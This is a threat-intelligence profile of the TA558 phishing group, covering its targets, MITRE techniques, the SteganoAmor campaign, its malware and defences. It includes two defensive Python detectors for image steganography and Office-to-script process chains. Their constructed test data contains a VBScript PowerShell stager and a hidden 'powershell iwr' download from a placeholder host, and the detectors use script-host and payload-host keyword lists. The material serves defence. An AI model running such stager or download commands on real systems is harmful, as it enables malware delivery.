TA558
TA558 is a financially motivated cybercrime group active since at least April 2018, primarily targeting hospitality, hotel, travel, and tourism organizations in Latin America with reservation-themed phishing campaigns. Designated by Proofpoint as a "small crime threat actor," the group has distributed at least 15 different malware families and evolved from simple Office exploits to sophisticated steganography-based delivery chains in its SteganoAmor campaign, which has impacted over 320 organizations worldwide across industrial, public, energy, and construction sectors.
Overview
TA558 is a financially motivated cybercrime group first identified by Proofpoint in April 2018, primarily targeting hospitality, hotel, travel, and tourism organizations in Latin America with secondary targeting in Western Europe and North America. Proofpoint characterizes the group as a "small crime threat actor" that sends malicious emails in Portuguese, Spanish, and occasionally English, using reservation-themed lures related to hotel room bookings and travel arrangements to trick employees in the hospitality sector into opening malicious attachments or clicking malicious URLs.
What distinguishes TA558 from typical phishing operators is the group's remarkable adaptability and the breadth of its malware arsenal. Over its operational history, TA558 has deployed at least 15 different malware families, with the most frequently observed payloads including Loda RAT, Vjw0rm, AsyncRAT, Revenge RAT, Agent Tesla, FormBook, Remcos RAT, LokiBot, Snake Keylogger, XWorm, and GuLoader. The group has demonstrated consistent willingness to adapt its delivery techniques in response to defensive changes, pivoting from Equation Editor exploits (CVE-2017-11882) to macro-enabled documents, then to container files (ISO, RAR) and URLs after Microsoft disabled macros by default in 2022.
In 2024, Positive Technologies uncovered TA558's SteganoAmor campaign, revealing over 320 attacks worldwide. This campaign marked a significant evolution in the group's sophistication, using steganography to embed malicious code within images and text files to evade content filters. The group also began using compromised legitimate SMTP servers for phishing delivery and compromised FTP servers for command-and-control, giving its operations a veneer of legitimacy. Targets expanded beyond hospitality to include industrial, public sector, electric power, construction, oil and gas, and maritime organizations across Latin America, Russia, Romania, Turkey, Japan, and other countries.
TA558's operations share tooling and infrastructure overlaps with other threat groups including Aggah and Blind Eagle, suggesting participation in a broader commodity malware ecosystem. The group continues to exploit the seven-year-old CVE-2017-11882 vulnerability in Microsoft Office Equation Editor, highlighting the persistent risk to organizations that have not updated legacy Office installations. Despite being classified as a "small" threat actor, TA558's global reach, diverse malware arsenal, and expanding target sectors make it a notable and persistent threat.
Target Profile
TA558 primarily targets Portuguese and Spanish speakers in Latin America, with additional targeting in Western Europe and North America. The SteganoAmor campaign expanded global reach to include Russia, Romania, Turkey, Japan, and other regions. The group focuses on organizations where reservation-themed lures appear legitimate, and where stolen customer data (including credit cards) has direct financial value.
- Hospitality and hotels: The core target sector since 2018. Hotels are targeted for customer payment card data, Booking.com account credentials, and guest personal information. A Lisbon hotel had its Booking.com account compromised, resulting in $511,314 stolen from customers. Compromised hotel websites are also used to host malware payloads.
- Travel and tourism: Travel agencies, tour operators, and airlines targeted with booking and reservation-themed lures. Customer data, itinerary information, and payment credentials are primary objectives.
- Industrial and manufacturing: Expanded targeting since 2019. The SteganoAmor campaign specifically impacted industrial, construction, and manufacturing sectors. Oil, gas, and maritime organizations increasingly targeted in 2023-2024.
- Government and public sector: Public institutions targeted in the SteganoAmor campaign, particularly in Latin America. Government organizations in Russia and Belarus also targeted per F.A.C.C.T. reporting.
- Financial services and banking: Banks and financial institutions targeted, particularly for credential theft via Agent Tesla and FormBook infostealers.
- Energy and utilities: Electric power and energy sector organizations identified as SteganoAmor campaign targets, representing an expansion from TA558's traditional hospitality focus.
- Business services: Consulting firms, service providers, and business support organizations, targeted since the group's 2019 expansion beyond its pure hospitality focus.
Tactics, Techniques & Procedures
TA558's TTPs have evolved significantly from 2018 to present, adapting to defensive changes while maintaining consistent reservation-themed lure content and Latin American targeting focus.
| MITRE ID | Technique | Description |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | Primary initial access method. Emails use reservation-themed lures in Portuguese, Spanish, and English (e.g., "reserva" themes, hotel booking confirmations). Attachments include Word/Excel documents, RAR/ZIP/ISO archives, and XHTML files with HTML smuggling. Sent from compromised legitimate SMTP servers to bypass email gateways. |
| T1203 | Exploitation for Client Execution | Extensively exploits CVE-2017-11882 (Microsoft Office Equation Editor RCE) across all campaign phases from 2018 to present. Despite being patched in 2017, this vulnerability remains effective against organizations running unpatched legacy Office installations. Documents trigger exploit upon opening to download subsequent payloads. |
| T1027.003 | Obfuscated Files or Information: Steganography | Signature technique in the SteganoAmor campaign. Embeds VBScript, PowerShell code, and reversed Base64-encoded executables within images hosted on legitimate services. Uses steganography to bypass content filters and antivirus detection. Payloads retrieved from free image-uploading and text-sharing websites. |
| T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell scripts embedded within steganographic payloads retrieve final-stage malware. Base64-encoded and obfuscated PowerShell used throughout the SteganoAmor delivery chain to download and execute payloads from images and text files. |
| T1059.005 | Command and Scripting Interpreter: Visual Basic | VBA macros in Office documents (pre-2022) and standalone VBScript files used for payload download and execution. VBS downloaders triggered by CVE-2017-11882 exploit fetch steganographic images from legitimate hosting services. |
| T1071.001 | Application Layer Protocol: Web Protocols | Uses compromised legitimate FTP servers for C2 and payload staging. Stolen data (Agent Tesla output) stored as HTML files on compromised servers. Leverages legitimate cloud services (Google Drive, paste sites, image hosting) for payload retrieval infrastructure. |
| T1102 | Web Service | Extensively uses legitimate web services for payload hosting and retrieval, including Google Drive, free image uploading sites, and text-sharing platforms. Abuses these services to host steganographic images and encoded payloads, complicating network-based detection. |
| T1036 | Masquerading | Malware payloads disguised within seemingly innocuous image files and documents. Uses file names themed around love and affection (e.g., greatloverstory.vbs, easytolove.vbs) in the SteganoAmor campaign. Container files (ISO, RAR) mask executable content. |
| T1555 | Credentials from Password Stores | Deployed malware (Agent Tesla, FormBook, LokiBot, Snake Keylogger) harvests stored credentials from web browsers, email clients, and other applications. Credential theft from hotel booking platforms (e.g., Booking.com) enables downstream fraud against customers. |
| T1056.001 | Input Capture: Keylogging | Agent Tesla, Snake Keylogger, and other deployed payloads capture keystrokes to harvest credentials, payment card data, and other sensitive information typed by victims. Screenshots also captured for intelligence gathering. |
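As an added, defender-side example (not code from the page or from any vendor report), a Python scanner for the trailing-data steganography pattern described in the T1027.003 and T1059 rows above: it flags image attachments that carry script keywords or a reversed Base64 executable after the PNG IEND or JPEG EOI marker. The sample images, the fake PE header and the VBScript stager are all constructed inline.

```python
"""Flag image files with a script or encoded executable appended after the real
end-of-image marker (the SteganoAmor pattern). Added example; samples constructed."""
import base64
import re

PNG_SIG, PNG_END = b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"
JPEG_SIG, JPEG_END = b"\xff\xd8", b"\xff\xd9"
SCRIPT_MARKERS = (b"createobject(", b"wscript.shell", b"powershell",  # stager strings, lower-case
                  b"-encodedcommand", b"frombase64string")
# Long Base64 run; a leading '=' is allowed so a *reversed* string is caught too.
B64_RUN = re.compile(rb"={0,2}[A-Za-z0-9+/]{64,}={0,2}")

def trailing_data(blob: bytes) -> bytes:
    """Bytes after the end marker; empty for a clean image or unknown format.
    Simplified: a JPEG carrying an EXIF thumbnail has an inner FFD9 as well."""
    end = PNG_END if blob.startswith(PNG_SIG) else JPEG_END if blob.startswith(JPEG_SIG) else None
    idx = blob.find(end) if end else -1
    return blob[idx + len(end):] if idx != -1 else b""

def decoded_runs(data: bytes):
    """Decode each long Base64 run forwards and reversed: TA558 reverses the
    Base64 text of the executable, hiding the usual 'TVqQ' PE prefix."""
    for match in B64_RUN.finditer(data):
        run = match.group(0)
        for label, text in (("base64", run), ("reversed base64", run[::-1])):
            try:
                yield label, base64.b64decode(text, validate=True)
            except ValueError:  # binascii.Error is a ValueError: not valid Base64
                continue

def scan_image(blob: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    tail = trailing_data(blob)
    if not tail:
        return []
    findings = [f"{len(tail)} bytes appended after end-of-image marker"]
    low = tail.lower()
    findings += [f"script marker {m.decode()!r} in appended data"
                 for m in SCRIPT_MARKERS if m in low]
    findings += [f"{label} run decodes to a PE executable (MZ header)"
                 for label, dec in decoded_runs(tail) if dec.startswith(b"MZ")]
    return findings

# Constructed samples: a minimal PNG, then the same PNG with a fake PE header
# (reversed Base64) and a VBScript stager appended, mimicking the campaign.
CLEAN_PNG = PNG_SIG + b"\x00\x00\x00\x00" + PNG_END
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"   # header bytes only, not a real binary
STAGER = b'Set sh = CreateObject("WScript.Shell")\r\nsh.Run "powershell -EncodedCommand <omitted>"'
STEGO_PNG = CLEAN_PNG + base64.b64encode(FAKE_PE)[::-1] + b"\r\n" + STAGER
```

Running `scan_image(STEGO_PNG)` reports the appended byte count, four script markers and the reversed-Base64 MZ header, while `scan_image(CLEAN_PNG)` returns an empty list.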
Known Campaigns
TA558 operates as a continuous campaign actor rather than executing discrete named operations. Proofpoint tracked 51 campaigns in 2022 alone. Key phases of evolution are documented below.
TA558's initial operational phase (2018-2019) used malicious Word attachments exploiting CVE-2017-11882 (Equation Editor) and remote template URLs to deliver Loda RAT and Revenge RAT. Campaigns were conducted exclusively in Spanish and Portuguese, targeting the hospitality sector with "reserva" (reservation) themed lures. In 2019, the group expanded targeting to business services and manufacturing, began using English-language lures, and added Vjw0rm to its payload arsenal.
The group then shifted from Equation Editor exploits to macro-enabled Office documents (Word, PowerPoint, Excel) carrying VBA code, and added AsyncRAT to its malware toolkit. Only five URL-based campaigns were conducted between 2018 and 2021. Activity in this period overlapped with reporting from Palo Alto Networks (2018), Cisco Talos (2020-2021), Uptycs (2020), and HP (2022).
In 2022, Proofpoint observed a major operational surge of 51 campaigns. After Microsoft disabled macros by default, TA558 pivoted from macro-enabled documents to container files (ISO, RAR) and URLs, running 27 URL-based campaigns in 2022 alone (versus 5 in total across 2018-2021). Loda, Revenge RAT, and AsyncRAT were delivered via new file types including Windows Shortcut (LNK) files, and compromised hotel websites were used to host malware payloads and lend legitimacy to C2 traffic.
SteganoAmor (2024) is TA558's most sophisticated campaign to date, uncovered by Positive Technologies with over 320 attacks identified worldwide. It used steganography to embed malicious code within images and text files, with payloads retrieved from legitimate hosting services, and continued to exploit CVE-2017-11882. Payloads included Agent Tesla, FormBook, Remcos RAT, LokiBot, GuLoader, Snake Keylogger, and XWorm. The group used compromised SMTP servers for phishing and FTP servers for C2. Targeting expanded globally to industrial, public sector, energy, construction, oil/gas, and maritime organizations across Latin America, Russia, Romania, Turkey, and Japan; F.A.C.C.T. reported attacks on enterprises, government agencies, and banks in Russia and Belarus using the same techniques.
Tools & Malware
TA558 exclusively uses commodity and off-the-shelf malware rather than custom tools, deploying at least 15 different malware families with overlapping C2 domains. This payload diversity is a defining characteristic of the group.
- Agent Tesla: Keylogger and credential stealer. Primary payload in SteganoAmor campaigns. Captures keystrokes, screenshots, and credentials from browsers and email clients. Stolen data stored as HTML files on compromised servers with naming pattern PW_*PC_name*_*date*_*time*.html.
- Remcos RAT: Commercial remote access tool enabling full control of compromised machines. Deployed in SteganoAmor and earlier campaigns. Used for reconnaissance, data theft, and follow-on payload delivery.
- FormBook / XLoader: Information stealer targeting credentials from web browsers, capturing screenshots, and enabling file download/execution. Frequently deployed alongside Agent Tesla in SteganoAmor attacks.
- LokiBot: Information stealer targeting stored credentials and sensitive data from browsers, email clients, and other applications.
- Loda RAT: One of TA558's earliest and most consistently deployed payloads since 2018. Provides remote access, keystroke logging, and data exfiltration capabilities.
- Revenge RAT: Remote access trojan deployed since early TA558 operations. Provides full remote control, keylogging, and credential harvesting.
- AsyncRAT: Open-source remote access tool added to TA558's arsenal around 2020. Provides remote desktop, keylogging, and file management capabilities.
- Vjw0rm: JavaScript-based worm and RAT used in TA558 campaigns, capable of self-propagation via USB drives and providing remote access.
- Snake Keylogger: Credential stealer focused on keystroke logging and screenshot capture. Deployed in SteganoAmor campaign.
- XWorm: Remote access trojan providing command execution and access to sensitive information on compromised systems. Deployed in SteganoAmor attacks.
- GuLoader: Downloader that aids in evading antivirus detection. Used as an intermediate loader in SteganoAmor chains to fetch final-stage payloads.
Indicators of Compromise
TA558 uses commodity malware with overlapping C2 domains and compromised legitimate infrastructure, making static IOC tracking challenging. Positive Technologies published a comprehensive IOC list with the SteganoAmor report.
Because the SMTP and FTP servers used for delivery and C2 are compromised legitimate infrastructure, blocking their IPs or domains risks disrupting legitimate services. Prioritize payload and behavioral detection, and use infrastructure indicators to support rather than drive blocking decisions.
Mitigation & Defense
Organizations in the hospitality, travel, and tourism sectors in Latin America are at highest risk. The continued exploitation of a 2017 vulnerability makes patching the single highest-impact defensive action.
- Patch Microsoft Office (CVE-2017-11882): This is the single highest-impact mitigation. TA558's entire SteganoAmor attack chain relies on a vulnerability patched in 2017. Updating Microsoft Office to any version released after November 2017 renders the primary infection vector completely ineffective. Audit all endpoints for legacy Office installations.
- Implement steganalysis in email security: Deploy email security solutions capable of detecting steganographic payloads within image and text file attachments. Monitor for VBScript, PowerShell code, and Base64-encoded content embedded within image files. Consider sandboxing all image attachments from external sources.
- Block macro and script execution: Disable VBA macros in Office documents from external sources. Block HTA file execution via email attachments. Implement Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes or executing scripts.
- Monitor for commodity RAT indicators: Deploy endpoint detection for Agent Tesla, Remcos, FormBook, LokiBot, and other commodity malware families used by TA558. Monitor for keylogger activity, credential store access, and screenshot capture behavior.
- Audit SMTP and FTP server security: TA558 compromises legitimate servers for phishing delivery and C2. Monitor your own SMTP and FTP servers for unauthorized use. Implement SPF, DKIM, and DMARC to prevent your domains from being spoofed in TA558 phishing campaigns.
- Train hospitality staff on reservation-themed phishing: Educate front desk, reservations, and booking staff to recognize phishing emails disguised as legitimate reservations. TA558 lures are specifically designed to appear as normal business communications in the hospitality sector.
- Monitor connections to payload hosting services: Alert on downloads of VBS, PowerShell, or executable content from free image-uploading and text-sharing websites. Monitor for unusual Google Drive downloads triggered by Office document opens.
- Protect booking platform credentials: Enforce MFA on all booking platform accounts (Booking.com, Expedia, etc.). Monitor for unauthorized access to these accounts, which TA558 has compromised for downstream customer fraud.
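An added detection example, not code from the page or any vendor product, covering the "Block macro and script execution" and "Monitor connections to payload hosting services" items above. It triages constructed Sysmon-style process-creation events for three behaviours: Equation Editor (EQNEDT32.EXE, the process in which CVE-2017-11882 exploits execute) spawning any child, Office applications spawning script hosts, and script hosts fetching from an assumed watch-list of image and paste hosting domains (placeholder names; a real deployment would feed in its proxy's URL categories).

```python
"""Flag the TA558 delivery chain in process-creation telemetry: Equation Editor
spawning a child (CVE-2017-11882 exploits run inside EQNEDT32.EXE), Office apps
spawning script hosts, and script hosts fetching from image/paste hosting.
Added example (not the page's or any vendor's); the telemetry is constructed."""
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"}
# Assumed watch-list (placeholder domains); a deployment would use its proxy's URL categories.
PAYLOAD_HOSTS = {"drive.google.com", "img-host.example", "paste.example"}
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.I)

def exe_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the detection rules one Sysmon-style event triggers (empty if none)."""
    parent, child = exe_name(event["ParentImage"]), exe_name(event["Image"])
    hits = []
    if parent == "eqnedt32.exe":
        hits.append("equation-editor-child-process")   # any child of EQNEDT32 is abnormal
    elif parent in OFFICE and child in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")       # macro / LNK / HTA stagers
    if child in SCRIPT_HOSTS:
        for host in URL_RE.findall(event.get("CommandLine", "")):
            if host.lower() in PAYLOAD_HOSTS:
                hits.append(f"script-host-fetches-from:{host.lower()}")
    return hits

def triage(events) -> dict:
    """Map ProcessId -> rule hits for every event that fired at least one rule."""
    return {e["ProcessId"]: hits for e in events if (hits := classify(e))}

# Constructed telemetry: a normal Word launch followed by the exploit chain.
EVENTS = [
    {"ProcessId": 100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "CommandLine": "WINWORD.EXE reserva.docx"},
    {"ProcessId": 200, "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c easytolove.vbs"},
    {"ProcessId": 300, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wscript.exe", "CommandLine": "wscript easytolove.vbs"},
    {"ProcessId": 400, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden iwr https://img-host.example/i/lure.png"},
]

if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits)
```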
TA558 shares tooling and infrastructure patterns with Aggah and Blind Eagle (APT-C-36), suggesting participation in a broader commodity malware ecosystem serving Latin American cybercriminals. Attribution of specific attacks to TA558 vs. overlapping groups can be challenging due to shared malware families and infrastructure. Note: an earlier report incorrectly identified TA558 as synonymous with TA505; these are separate threat actors. TA558 is a significantly smaller operation focused on hospitality, while TA505 is a larger group associated with Dridex and Clop ransomware.
Sources & Further Reading
Attribution and references used to build this profile.
- Proofpoint — Reservations Requested: TA558 Targets Hospitality and Travel (2022)
- Positive Technologies — SteganoAmor Campaign: TA558 Mass-Attacking Companies Worldwide (2024)
- The Hacker News — TA558 Hackers Weaponize Images for Wide-Scale Malware Attacks (2024)
- The Hacker News — Cybercrime Group TA558 Targeting Hospitality Organizations (2022)
- Dark Reading — TA558 Ramps Up Attacks on Hospitality, Travel Sectors (2022)
- AlphaHunt — SteganoAmor: TA558's Image-Hidden Malware Targets Oil, Gas & Maritime (2025)
- BleepingComputer — SteganoAmor Attacks Target 320 Orgs Globally (2024)
- CyberMaterial — TA558 Threat Actor Profile
- Malpedia — TA558 Threat Actor